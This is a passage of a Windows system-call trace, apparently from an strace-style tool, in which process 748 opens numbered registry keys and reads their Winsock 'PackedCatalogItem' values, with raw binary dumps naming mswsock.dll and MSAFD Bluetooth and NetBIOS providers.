0L\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0M\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5&\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0d\200\304\237\230r\344C\267\275\30\37 \211y*\374\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0 \0\0\0\36\0\0\0\36\0\0\0\1\0\0\0\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0R\0f\0C\0o\0m\0m\0 \0[\0B\0l\0u\0e\0t\0o\0o\0t\0h\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0J\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0J\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0K\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\07\0K\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0L\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0L\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0M\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0L\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0M\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5&\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0d\200\304\237\230r\344C\267\275\30\37 \211y*\374\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0 \0\0\0\36\0\0\0\36\0\0\0\1\0\0\0\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0R\0f\0C\0o\0m\0m\0 \0[\0B\0l\0u\0e\0t\0o\0o\0t\0h\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0J\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0J\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0K\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\07\0K\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0L\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0L\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0M\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00586   748   NtClose  (80, ... ) == 0x0
 00587   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000007"}, ... 80, ) }, ... 80, ) == 0x0
 00588   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00589   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00590   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\23\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\373\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0F\0C\0C\00\03\0A\04\01\0-\08\0C\0C\0C\0-\04\09\01\09\0-\0A\0\0\0\0\0\204\3\0\0O\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0O\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0P\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\08\0P\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0Q\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0Q\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0R\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\23\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\373\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0F\0C\0C\00\03\0A\04\01\0-\08\0C\0C\0C\0-\04\09\01\09\0-\0A\0\0\0\0\0\204\3\0\0O\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0O\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0P\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\08\0P\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0Q\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0Q\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0R\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0Q\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0R\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\23\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\373\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0F\0C\0C\00\03\0A\04\01\0-\08\0C\0C\0C\0-\04\09\01\09\0-\0A\0\0\0\0\0\204\3\0\0O\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0O\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0P\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\08\0P\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0Q\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0Q\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0R\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00591   748   NtClose  (80, ... ) == 0x0
 00592   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000008"}, ... 80, ) }, ... 80, ) == 0x0
 00593   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00594   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00595   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\24\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\373\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0F\0C\0C\00\03\0A\04\01\0-\08\0C\0C\0C\0-\04\09\01\09\0-\0A\0\0\0\0\0\204\3\0\0T\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0T\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0U\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\09\0U\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0V\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0V\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0W\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\24\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\373\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0F\0C\0C\00\03\0A\04\01\0-\08\0C\0C\0C\0-\04\09\01\09\0-\0A\0\0\0\0\0\204\3\0\0T\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0T\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0U\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\09\0U\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0V\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0V\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0W\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0V\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0W\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\24\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\373\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0F\0C\0C\00\03\0A\04\01\0-\08\0C\0C\0C\0-\04\09\01\09\0-\0A\0\0\0\0\0\204\3\0\0T\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0T\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0U\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\09\0U\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0V\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0V\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0W\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00596   748   NtClose  (80, ... ) == 0x0
 00597   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000009"}, ... 80, ) }, ... 80, ) == 0x0
 00598   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00599   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00600   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\25\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\374\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 